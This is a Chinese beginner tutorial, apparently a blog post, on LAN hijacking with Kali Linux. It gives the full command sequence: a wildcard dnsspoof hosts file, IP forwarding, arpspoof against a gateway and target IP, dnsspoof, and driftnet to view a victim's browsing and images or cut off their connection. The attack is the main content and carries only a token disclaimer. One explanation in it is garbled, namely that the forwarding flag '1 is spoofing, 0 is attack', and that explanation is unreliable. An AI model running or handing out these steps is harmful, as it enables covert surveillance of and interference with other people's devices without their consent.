局域网dns欺骗攻击不能上网_局域网下实现劫持其他人设备

使用系统:Kali Linux

免费无毒下载地址:https://www.kali.org/

以下内容是本人的渗透技术学习笔记,由于本篇文章比较敏感,所以这里只列举最基础的劫持手法,感兴趣的各位请自行拓展。

教程全程小白教学,无需掌握任何技术。

教程最终可实现,在局域网下可监控其他在局域网下的任何设备。可以查看对方浏览的网页等等信息,也可以拦截对方的数据包让对象无法联网。教程开始。

1、创建一个名为DNS.txt的文件:

touch DNS.txt

e142df6ee2fcff98db934a84ad7618db.png

2、使用vi命令进入该文件:

vi DNS.txt

00bbd3f74aa04a10cc24c444ea8d249c.png

3、进入文件后是无法输入内容的,按下i键进入insert状态可输入内容。

99054d0b4b8c3a28fc1d20fc352bb5cc.png

4、内容为

kali虚拟机的ip地址 *.*.*

0769bcfad78d2df809403660f6dea779.png

如:192.168.0.101 *.*.*

*.*.*含义为对方要访问的IP地址,这种格式可以监控对方发送的任何地址请求。

5、保存文件:由于当前处于插入状态,按下键盘ESC键(键盘左上角)退出insert状态,然后同时按下shift+:进入命令状态,输入wq保存并退出。

1f7ad11443a9b017c904950b9aa40294.png

注意:如果不能保存文件,可以修改该文件的权限:

chmod a+x DNS.txt

6、打开ARP欺骗:

echo 1 >/proc/sys/net/ipv4/ip_forward

数字1是欺骗,0是攻击,以下列举欺骗流程。

75622d0bb6837f84454d0c3c3c621fac.png

7、执行欺骗:

arpspoof -i eth0 -t 192.168.0.1 -r 目标IP地址

其中eth0是你的网卡。网卡可通过ifconfig命令查看

其中192.168.0.1是网关。

ac314b7cadd82b75cc3c6eba93deddf0.png

8、开启DNS监控:

dnsspoof -i eth0 -f DNS.txt

这里DNS.txt就是刚刚创建的文件路径

现在就已经可以监控目标IP在浏览什么网址或信息。

10b1285e9daaca40cbb0bc7089306c69.png

9、监控目标浏览的图片:driftnet -i eth0

内容仅供学习交流!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值